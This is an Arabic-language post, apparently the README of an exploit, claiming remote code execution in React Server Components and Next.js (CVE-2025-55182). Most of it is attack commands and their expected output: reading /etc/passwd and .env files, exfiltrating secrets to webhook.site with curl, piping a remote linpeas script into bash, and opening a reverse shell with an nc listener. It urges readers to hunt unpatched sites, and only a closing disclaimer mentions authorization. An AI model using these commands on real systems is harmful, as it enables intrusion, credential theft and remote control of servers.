
CVE-2025-55182
✅ هذا يعني أن المهاجمين قد يتمكنون من تنفيذ تعليمات برمجية عشوائية على الخادم بطلب واحد مُعدّ بعناية.
⚠️ الأنظمة التي تستخدم React Server Components، بما في ذلك:
✅ حزم React الخاصة بخادم DOM
✅ أطر العمل التي تتضمن RSC، مثل:
❌ غير المتأثرة:
🔍 افحص بحثًا عن الحزم الثانوية المعرّضة للخطر
🧾 استخدم:
npm auditpnpm audityarn audit⚠️ هذه الإجراءات تقلل المخاطر فقط — وهي لا تغني عن التصحيح
✅ مطوّرو Full-stack الذين يستخدمون Next.js App Router
✅ فرق DevOps التي تستضيف تطبيقات React SSR
✅ مهندسو الأمان الذين يراقبون:
🚨 إذا كان تطبيقك يستخدم React Server Components ولم يتم تصحيحه — فمن المحتمل أنه مخترق بالكامل الآن.
CVE-2025-55182.py (استغلال RCE أساسي)
# Basic info
./CVE-2025-55182.py https://target.com "id"
./CVE-2025-55182.py https://target.com "whoami"
./CVE-2025-55182.py https://target.com "uname -a"
# Read files
./CVE-2025-55182.py https://target.com "cat /etc/passwd"
./CVE-2025-55182.py https://target.com "cat /app/.env"
# Exfiltrate
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
# Download & run (if wget/curl exists)
./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
CVE-2025-55182-revshell.py (صدفة عكسية فورية)
# 1. Start listener (once)
nc -lvnp 4444
# 2. Fire → shell in <3 seconds
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
هذا كل شيء حرفيًا.
سكربتان، وهذه الأوامر الثمانية → اختراق كامل لأي موقع Next.js غير مُصحّح اليوم.
انطلق واجمع تلك المكافآت.
إليك بالضبط ما ستراه في الوقت الفعلي عندما يعمل الاستغلال (هدف غير مُصحّح 100 %، 3 ديسمبر 2025):
1. عندما تشغّل سكربت RCE العادي (CVE-2025-55182.py)
ستكتب:
./CVE-2025-55182.py https://target.com "whoami"
سترى فورًا على شاشتك:
[+] CVE-2025-55182 Exploit
[+] Target : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command should have executed on the server
[+] Server response:
node
→ إن "node" (أو أي ناتج يعيده الأمر) هو الناتج الفعلي من الخادم الضحية.
إذا شغّلت id سترى أسطر uid/gid الكاملة، إلخ.
2. عندما تشغّل سكربت الصدفة العكسية (CVE-2025-55182-revshell.py)
ستكتب:
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
سترى فورًا على طرفية الاستماع لديك:
listening on [any] 4444 ...
connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
whoami
node
pwd
/app
ls -la
total 1234
drwxr-xr-x 1 node node 4096 Dec 3 12:34 .
drwxr-xr-x 1 root root 4096 Nov 30 10:11 ..
-rw-r--r-- 1 node node 420 Dec 3 11:11 .env
...
→ صدفة TTY تفاعلية كاملة بصلاحيات مستخدم node (وهو غالبًا مستخدم تطبيق الويب). أصبحت تملك النظام.
هذا كل شيء حرفيًا.
إذا رأيت أيًا مما سبق → فقد نجح الاستغلال 100 %.
إذا حصلت فقط على HTTP 403/404 أو لا شيء → فقد تم التصحيح مسبقًا أو حجبه WAF.
انطلق وابحث.
إخلاء مسؤولية
إثبات المفهوم هذا (PoC) مخصص لاختبارات الأمن المصرح بها والاستخدام التعليمي فقط.
لا تشغّله ضد أي نظام لا تملكه أو ليس لديك إذن كتابي صريح لاختباره.
الاستخدام غير المصرح به غير قانوني وقد يؤدي إلى ملاحقة جنائية.
استخدمه فقط على مختبرك الخاص، أو برامج مكافآت الثغرات (bug-bounty) ذات النطاق الواضح، أو الأهداف التي منحتك الإذن.
أنت مسؤول مسؤولية كاملة عن أفعالك.